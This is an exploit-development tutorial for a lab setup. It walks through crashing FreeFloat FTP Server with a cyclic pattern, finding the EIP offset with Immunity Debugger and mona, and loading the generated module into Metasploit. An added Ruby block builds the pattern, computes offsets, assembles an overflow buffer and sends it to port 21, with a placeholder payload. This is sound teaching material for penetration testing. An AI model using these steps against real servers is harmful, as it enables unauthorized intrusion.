
Writing an Exploit for Metasploit

Metasploit ships with a large library of modules and plugins that make penetration testing effective out of the box. It is also highly customizable: you can write your own exploit modules tailored to the system you are targeting. This walkthrough introduces stack-based buffer overflows and the exploits built on them, and shows how to write a simple Metasploit exploit module yourself.

Types of Exploits

Types of Exploits in Metasploit:

  • Active
  • Passive

The difference is who initiates the connection. An active exploit connects out to a specific target (the host you set as RHOST), attempts the exploit, and then terminates, whether it succeeded or failed. A passive exploit instead starts a listener and waits for a victim to connect to it, as a browser exploit or a malicious server does, and exploits each host that comes in. The exploit written in this guide is active: it connects to the FTP server and sends it a crafted buffer. Knowing the distinction now will pay off when you move on to more complicated exploits, because it determines which mixins and callbacks your module needs.

Our Setup

The software used in this tutorial includes the following:

The target: FreeFloat FTP Server, which has a known stack-based buffer overflow that we will exploit rather than discover from scratch.

Immunity Debugger: a Windows debugger used for exploit development and reverse engineering of binaries. It is free to download.

Windows XP Service Pack 3: the victim machine, running FreeFloat FTP Server with Immunity Debugger attached to it.

Kali Linux: the attacking machine. It ships with the Metasploit Framework.

Mona.py: a Python plugin for Immunity Debugger that automates much of the exploit-development work. Download mona.py and copy it into the PyCommands folder of the Immunity Debugger installation directory.

The Process

Imitate Fuzzing

We will perform a simplified form of fuzzing: sending the service far more input than it expects so that it crashes. The data is not random, though. We craft a cyclic pattern of 1,000 characters in which every four-byte window is unique (Metasploit's pattern_create tool generates such patterns), so that whatever ends up in the EIP register can be mapped back to an exact offset in the buffer. The pattern is sent to port 21, the FTP server's command port, as an FTP command.

Before sending it, start Immunity Debugger on the Windows machine and attach it to the running FreeFloat FTP process. Then send the pattern and confirm in the debugger that the server has crashed and that EIP now contains four bytes of the pattern. If EIP is not overwritten, the overflow has not reached the saved return address and the buffer needs to be longer.

Fire Up Mona

With EIP overwritten and the process still paused in Immunity Debugger, let mona generate a module from the crash state. In the debugger's command bar, enter:

!mona suggest

Mona asks what kind of exploit to build. Choose the TCP client type (our module connects out to the target) and enter port 21 as the service port.

Customize Exploit

Mona writes a Ruby-based Metasploit exploit module into its working folder. It already contains the offset to EIP it computed from the pattern, a candidate return address, and the skeleton that sends the buffer over TCP. You can edit it in any way you like; here we simply rename it to f.rb.

Launch the Exploit in Metasploit

Copy f.rb over to Kali Linux and place it in Metasploit's module tree, either under the framework's own modules/exploits directory or under the user module directory ~/.msf4/modules/exploits/, mirroring the exploits/windows/ftp layout. Then start msfconsole, reload the modules, and select the new module with use.

If the module loads without errors, Metasploit lists it alongside the built-in exploits and it can be configured (RHOSTS, LHOST, payload) and launched with exploit like any other module. A load error at this point almost always means a syntax problem introduced while editing f.rb.
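To make the mechanics of the procedure concrete, here is an added example written for this page; it is plain Ruby, not code from the article and not the module that mona generates, and it runs without the Metasploit framework. It shows the three steps that the fuzzing, the EIP check and the generated module rely on: building a cyclic pattern with the same scheme as Metasploit's pattern_create, mapping the EIP value displayed in Immunity Debugger back to an offset (what pattern_offset and mona do for you), and assembling the final buffer the module sends. The 1,000-byte length comes from the article; the offset used in the comments, the return address, the four-byte breakpoint payload and the choice of the USER command are assumptions made for the example, not values from the article.

```ruby
require 'socket'
require 'timeout'

# Cyclic pattern in Metasploit's pattern_create scheme: triples of
# uppercase, lowercase, digit ("Aa0Aa1...Aa9Ab0..."). Any four-byte window
# is unique within the first 20,280 bytes, so the EIP value identifies
# exactly one position in the buffer.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Map the EIP value shown in the debugger (hex, e.g. "37684136") back to an
# offset in the pattern. x86 is little-endian, so the register holds the four
# buffer bytes in reverse order. Returns nil if EIP was not a pattern value.
def pattern_offset(pattern, eip_hex)
  bytes = [eip_hex.sub(/\A0x/i, '')].pack('H*').reverse
  pattern.index(bytes)
end

# Assemble the exploit buffer: padding up to the saved return address, the
# chosen return address packed little-endian (this is the [ret].pack('V')
# seen in Metasploit modules), a NOP sled, the payload, and filler so the
# total stays at the length the crash was produced with.
# `ret` and `payload` are placeholders supplied by the caller.
def build_buffer(offset, ret, payload, total_len: 1000)
  buf = ('A' * offset).b
  buf << [ret].pack('V')
  buf << ("\x90".b * 16)
  buf << payload.b
  raise ArgumentError, 'payload does not fit in the buffer' if buf.bytesize > total_len
  buf << ('C' * (total_len - buf.bytesize)).b
  buf
end

# FTP commands are a verb, a space and the argument, terminated by CRLF.
def ftp_command(verb, arg)
  "#{verb} #{arg}\r\n"
end

# Deliver a buffer to the FTP control channel (port 21 in the article).
# The vulnerable command is not named in the article; USER is assumed here.
# Returns the server banner so the caller can tell a refused connection
# from a successful send that crashed the service.
def fuzz_ftp(host, port, data, verb: 'USER', timeout_s: 5)
  Timeout.timeout(timeout_s) do
    sock = TCPSocket.new(host, port)
    begin
      banner = sock.gets
      sock.write(ftp_command(verb, data))
      banner
    ensure
      sock.close
    end
  end
end

# Worked run with constructed values (no network needed):
# 1. pattern = pattern_create(1000) is what fuzz_ftp(target, 21, pattern) sends.
# 2. If the debugger then shows EIP = 37684136, pattern_offset(pattern,
#    "37684136") returns 230 (the offset in this example; verify yours).
# 3. build_buffer(230, 0xdeadbeef, "\xcc".b * 4) is the shape of the buffer the
#    generated module sends, with the hypothetical return address 0xdeadbeef
#    and an INT3 payload standing in for real shellcode.
```

The two numbers worth checking by hand before trusting what mona suggest wrote into f.rb are the offset (step 2) and the return address: send a buffer of the computed offset followed by four distinct bytes such as "BBBB" and confirm EIP reads 0x42424242, then confirm the chosen return address points at a usable instruction (for example a JMP ESP) in a module without rebasing or protections. Inside the generated module these same steps appear as Rex::Text.pattern_create, Rex::Text.pattern_offset and [target['Ret']].pack('V') written into the buffer that connect and sock.put deliver.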

Conclusion

This was a mini-tutorial on how to write a Metasploit exploit. We will discuss more complicated exploits and see how they are written in future articles.

About the author

Younis Said

I am a freelance software project developer, a software engineering graduate, and a content writer. I love working with Linux and open-source software.